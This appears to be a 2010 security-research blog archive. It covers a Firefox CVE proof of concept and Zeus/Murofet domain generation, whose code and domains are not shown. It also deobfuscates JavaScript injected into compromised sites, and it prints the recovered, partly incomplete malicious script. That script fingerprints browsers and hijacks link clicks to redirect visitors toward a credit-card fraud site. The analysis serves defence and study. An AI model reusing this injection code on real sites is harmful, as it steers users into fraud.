Thursday, October 28, 2010

CVE-2010-3765 - proof of concept - update

October 29, 2010 - UPDATE: the working exploit (according to the BugX blog):
October 28, 2010
For those who still do not know, the proof of concept for CVE-2010-3765 is the following:


More details at:
The issue seems to be resolved with Firefox 3.6.12.

As mentioned in some of my older posts, reading a Bugzilla repository is always a good thing:

Feedback is welcome.

Thursday, October 14, 2010

Some domains for the LICAT / Murofet / Trojan/ZBOT.B threat

Update (2 November): a deep and very interesting analysis from Trend Micro:

Update (15 October): ThreatExpert has released the domain name generation algorithm for MUROFET/Licat:

(14 October)
I have found some new domains involved in this threat, as you can see in the following list:

The value 333 for the "s" URL parameter permits the download of what is recognized as Trojan/ZBot.B (Symantec name), while 111 stands for "get the Zeus 2.1 (as named by ZeusTracker) config file". The drop zone is requested with the following syntax:


This malware seems to use a C&C domain name generation approach similar to the one used by Conficker. For example, the latest domain ( ) seems to be registered for the malware activity of 14 October 2010, as reported by

The following Anubis Binary Analysis submission shows the behaviour of this malware:

and the ThreatExpert analysis with detection engine info:

The domains above seem to be hosted on the following IP address:

The following Robtex table permits to retrieve other domains involved:

Wednesday, October 6, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds ( and black hat seo ) – part 0.2

Trying to find some common factors in the pages included in the compromised sites (as indicated in the previous post), there is evidence of a large number of sites suffering from the same problem. In particular, searching for keywords that are common to many of these malicious pages gives the following results:

As well:

Yet another dork that retrieves a very similar URL format:
This reasonably confirms that this stuff is related to a big (and well organized) Black Hat SEO campaign. Many thanks for their support to Edgar Tools and to the author of JJEncode.

Tuesday, October 5, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds

January 25, 2011 – Update:
a detailed analysis that also references my post:
Internet Explorer exSploit Milk codes

October 5, 2010:

From the MDL forum I got a post where a user (many thanks to Edgar) reported a strange piece of Javascript code injected into some Italian web sites. Specifically, the message is located at the following URL:
The reported code looks like the following screenshot:

At first look it appears to be nonsense code for anyone who is not a Javascript guru, like me. So I decided to try to decode this very interesting code in order to find out what it does. The first step was to place some Javascript alert() calls in the prologue code, so the first lines of code were modified as follows:
The blue pills show where the alert() calls have been placed. Executing this extract of the code, the alert call sequence generated these results:
The rest of the deobfuscation is obtained by placing the code referenced by "Function()" inside a textarea, as follows:
The end of the obfuscated code must also be modified as shown:
Once this modified code is placed in a test HTML page and rendered by Firefox, the following deobfuscated jQuery-style code is obtained:
page_links = [];

// Runs f once the page has loaded, whichever event API the browser offers.
function setGlobalOnLoad(f) {
    var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null;
    if (root) {
        if (root.addEventListener) root.addEventListener("load", f, false);
        else if (root.attachEvent) root.attachEvent("onload", f);
    } else {
        if (typeof window.onload == 'function') {
            var existing = window.onload;
            window.onload = function() {
                // body lost in the post (presumably calls existing() and then f())
            };
        } else {
            window.onload = f;
        }
    }
}

// Cross-browser event registration (W3C addEventListener or IE attachEvent).
function addHandler(object, event, handler) {
    if (typeof object.addEventListener != 'undefined')
        object.addEventListener(event, handler, false);
    else if (typeof object.attachEvent != 'undefined')
        object.attachEvent('on' + event, handler);
}

// Browser/referrer gate: Google Toolbar or Chrome user agent, or an external referrer.
if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer != '' || document.referrer.indexOf(document.domain) == -1) {
    var right_browser = 'yes';
} else var right_browser = 'no';

// Standard cookie reader: returns the value of c_name or "" if absent.
function getCookie(c_name) {
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(c_name + "=");
        if (c_start != -1) {
            c_start = c_start + c_name.length + 1;
            // line lost in the post; the usual pattern here is c_end = document.cookie.indexOf(";", c_start);
            if (c_end == -1) c_end = document.cookie.length;
            return unescape(document.cookie.substring(c_start, c_end));
        }
    }
    return "";
}

var c_index = Math.floor(Math.random() * 5);
var fcoo = getCookie('c_first');
var exdate = new Date();
// Marks this browser as already seen, so the redirect is armed at most once.
document.cookie = 'c_first' + "=" + escape('false') + ";expires=" + exdate.toUTCString();

// Arms the redirect only on one of five page loads, on the first visit, for a "right" browser.
if (c_index == 4 && fcoo != 'false' && right_browser == 'yes') {
    setGlobalOnLoad(function() {
        var block = document.getElementById('mlk');
        var links = block.getElementsByTagName('A');
        for (var i = 0; i < links.length; i++) {
            // loop body lost in the post (collects the hrefs of the injected block into page_links)
        }
        var links = document.links;
        for (var i = 0; i < links.length; i++) {
            addHandler(links[i], "click", function(event) {
                var index = Math.floor(Math.random() * (page_links.length - 1));
                // left-hand side lost in the post:
                // ... = page_links[index];
            });
        }
    });
}
Update: the code has been obfuscated using the following encoding script (Mowab, thank you very much for your support):
The obtained code at first sight seems to be a loader for the href objects injected into the compromised web page (as shown alongside). Also, the bolded line of code:
var block = document.getElementById('mlk');
is the assignment of the object that contains the links to the malicious HTML page injected into the compromised hosts. In particular, all the servers listed and reported in the MDL post seem to reference URLs like these:
The injected HTML page leads to a site blacklisted for credit card fraud. In this case the compromised host analyzed is . Calling, for example,
this page is retrieved:
Clicking on one of the download buttons, a CAPTCHA request appears as follows:
Clicking on the download button calls the following URL:

Following the download sequence, a message appears that entices the user to sign up in order to download the desired file:

Trying to sign up, a fake promotional message like this is shown:
The checkout action tries to contact this website,
which is blacklisted for credit card fraud, as noted by the MyWOT response:
I think that the compromised hosts, as reported at the beginning of this post, have been used as part of a Black Hat SEO infrastructure with the goal of enticing users to download stuff from a credit card fraud web site.